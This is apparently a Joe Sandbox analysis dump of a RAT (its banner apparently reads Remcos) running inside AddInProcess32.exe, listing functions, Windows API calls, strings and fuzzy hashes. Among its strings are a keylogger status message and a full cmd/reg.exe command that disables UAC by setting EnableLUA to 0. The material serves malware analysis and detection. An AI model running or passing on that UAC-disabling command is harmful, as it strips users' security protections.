                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                  • String ID:
                  • API String ID: 493672254-0
                  • Opcode ID: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                  • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                  • Opcode Fuzzy Hash: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                  • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                  Function 0044A004 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 305COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: __alldvrm$_strrchr
                  • String ID: PkGNG
                  • API String ID: 1036877536-263838557
                  • Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                  • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                  • Opcode Fuzzy Hash: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                  • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                  Function 00448215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                  • _free.LIBCMT ref: 0044824C
                  • _free.LIBCMT ref: 00448274
                  • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                  • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                  • _abort.LIBCMT ref: 00448293
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorLast$_free$_abort
                  • String ID:
                  • API String ID: 3160817290-0
                  • Opcode ID: 35dcf3de7c71c62167c4cd53af3f8df7186468cbd06746618ca28f838e92064e
                  • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                  • Opcode Fuzzy Hash: 35dcf3de7c71c62167c4cd53af3f8df7186468cbd06746618ca28f838e92064e
                  • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                  Function 0041AAA6 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                  Download Yara Rule
                  APIs
                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Service$CloseHandle$Open$ControlManager
                  • String ID:
                  • API String ID: 221034970-0
                  • Opcode ID: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                  • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                  • Opcode Fuzzy Hash: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                  • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                  Function 0041ABAA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                  Download Yara Rule
                  APIs
                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Service$CloseHandle$Open$ControlManager
                  • String ID:
                  • API String ID: 221034970-0
                  • Opcode ID: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                  • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                  • Opcode Fuzzy Hash: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                  • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                  Function 0041AC11 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                  Download Yara Rule
                  APIs
                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Service$CloseHandle$Open$ControlManager
                  • String ID:
                  • API String ID: 221034970-0
                  • Opcode ID: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                  • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                  • Opcode Fuzzy Hash: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                  • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                  Function 00442801 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: PkGNG
                  • API String ID: 0-263838557
                  • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                  • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                  • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                  • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                  Function 00404CC3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121synchronizationthreadCOMMON
                  Download Yara Rule
                  APIs
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                  • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404DD2
                  • CloseHandle.KERNEL32(?), ref: 00404DDB
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                  • String ID: PkGNG
                  • API String ID: 3360349984-263838557
                  • Opcode ID: 49fe4c89c4b53e0bfaa247814761066ed204ae0ee87e3a5f8c156f36cd8984b3
                  • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                  • Opcode Fuzzy Hash: 49fe4c89c4b53e0bfaa247814761066ed204ae0ee87e3a5f8c156f36cd8984b3
                  • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                  Function 0040B164 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                  Download Yara Rule
                  APIs
                  • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                  • wsprintfW.USER32 ref: 0040B1F3
                    • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: EventLocalTimewsprintf
                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                  • API String ID: 1497725170-248792730
                  • Opcode ID: 48ae87abe5a633f6dbf757c3d9d37f4c5ebff31f90a39cbd1b197af817f8fe73
                  • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                  • Opcode Fuzzy Hash: 48ae87abe5a633f6dbf757c3d9d37f4c5ebff31f90a39cbd1b197af817f8fe73
                  • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                  Function 0040A675 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                  • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                  • CloseHandle.KERNEL32(00000000), ref: 0040A6EE
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleSizeSleep
                  • String ID: XQG
                  • API String ID: 1958988193-3606453820
                  • Opcode ID: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
                  • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                  • Opcode Fuzzy Hash: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
                  • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                  Function 0041D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ClassCreateErrorLastRegisterWindow
                  • String ID: 0$MsgWindowClass
                  • API String ID: 2877667751-2410386613
                  • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                  • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                  • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                  • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                  Function 00407755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                  Download Yara Rule
                  APIs
                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                  • CloseHandle.KERNEL32(?), ref: 004077AA
                  • CloseHandle.KERNEL32(?), ref: 004077AF
                  Strings
                  • C:\Windows\System32\cmd.exe, xrefs: 00407796
                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandle$CreateProcess
                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                  • API String ID: 2922976086-4183131282
                  • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                  • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                  • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                  • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                  Function 00407260 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                  Download Yara Rule
                  Strings
                  • SG, xrefs: 004076DA
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, xrefs: 004076C4
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  • API String ID: 0-1732489412
                  • Opcode ID: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
                  • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                  • Opcode Fuzzy Hash: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
                  • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                  Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                  Download Yara Rule
                  APIs
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                  • SetEvent.KERNEL32(?), ref: 0040512C
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                  • CloseHandle.KERNEL32(?), ref: 00405140
                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                  • String ID: KeepAlive | Disabled
                  • API String ID: 2993684571-305739064
                  • Opcode ID: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
                  • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                  • Opcode Fuzzy Hash: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
                  • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                  Function 0041ADC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                  • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                  • Sleep.KERNEL32(00002710), ref: 0041AE07
                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: PlaySound$HandleLocalModuleSleepTime
                  • String ID: Alarm triggered
                  • API String ID: 614609389-2816303416
                  • Opcode ID: b7b395eb2d8a8c6ac5b29d0703eec326aa80e776d4c85912c0c2915f52647228
                  • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                  • Opcode Fuzzy Hash: b7b395eb2d8a8c6ac5b29d0703eec326aa80e776d4c85912c0c2915f52647228
                  • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                  Function 0041CD58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                  Download Yara Rule
                  APIs
                  • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                  • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CD6F
                  • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CD7C
                  • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CD8F
                  Strings
                  • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Console$AttributeText$BufferHandleInfoScreen
                  • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                  • API String ID: 3024135584-2418719853
                  • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                  • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                  • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                  • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                  Function 0044139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                  • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                  • Opcode Fuzzy Hash: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                  • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                  Function 00444CFB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                  • _free.LIBCMT ref: 00444E06
                  • _free.LIBCMT ref: 00444E1D
                  • _free.LIBCMT ref: 00444E3C
                  • _free.LIBCMT ref: 00444E57
                  • _free.LIBCMT ref: 00444E6E
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free$AllocateHeap
                  • String ID:
                  • API String ID: 3033488037-0
                  • Opcode ID: bf8b46b868af2ecf30d3444370171b65bdd51122b8350dbbe1b9982e260663b5
                  • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                  • Opcode Fuzzy Hash: bf8b46b868af2ecf30d3444370171b65bdd51122b8350dbbe1b9982e260663b5
                  • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                  Function 00449365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                  • _free.LIBCMT ref: 004493BD
                    • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                    • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                  • _free.LIBCMT ref: 00449589
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                  • String ID:
                  • API String ID: 1286116820-0
                  • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                  • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                  • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                  • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                  Function 0040F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                  • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                  • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                    • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                    • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                    • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                  • String ID:
                  • API String ID: 4269425633-0
                  • Opcode ID: 371d05c907dcca9c3c12ab80cf798e7523ffd5e5ecf3e3ca40c8afe2c02f4cbd
                  • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                  • Opcode Fuzzy Hash: 371d05c907dcca9c3c12ab80cf798e7523ffd5e5ecf3e3ca40c8afe2c02f4cbd
                  • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                  Function 00443DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free
                  • String ID:
                  • API String ID: 269201875-0
                  • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                  • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                  • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                  • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                  Function 0044F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                  Download Yara Rule
                  APIs
                  • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                    • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                  • _free.LIBCMT ref: 0044F3BF
                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                  • String ID:
                  • API String ID: 336800556-0
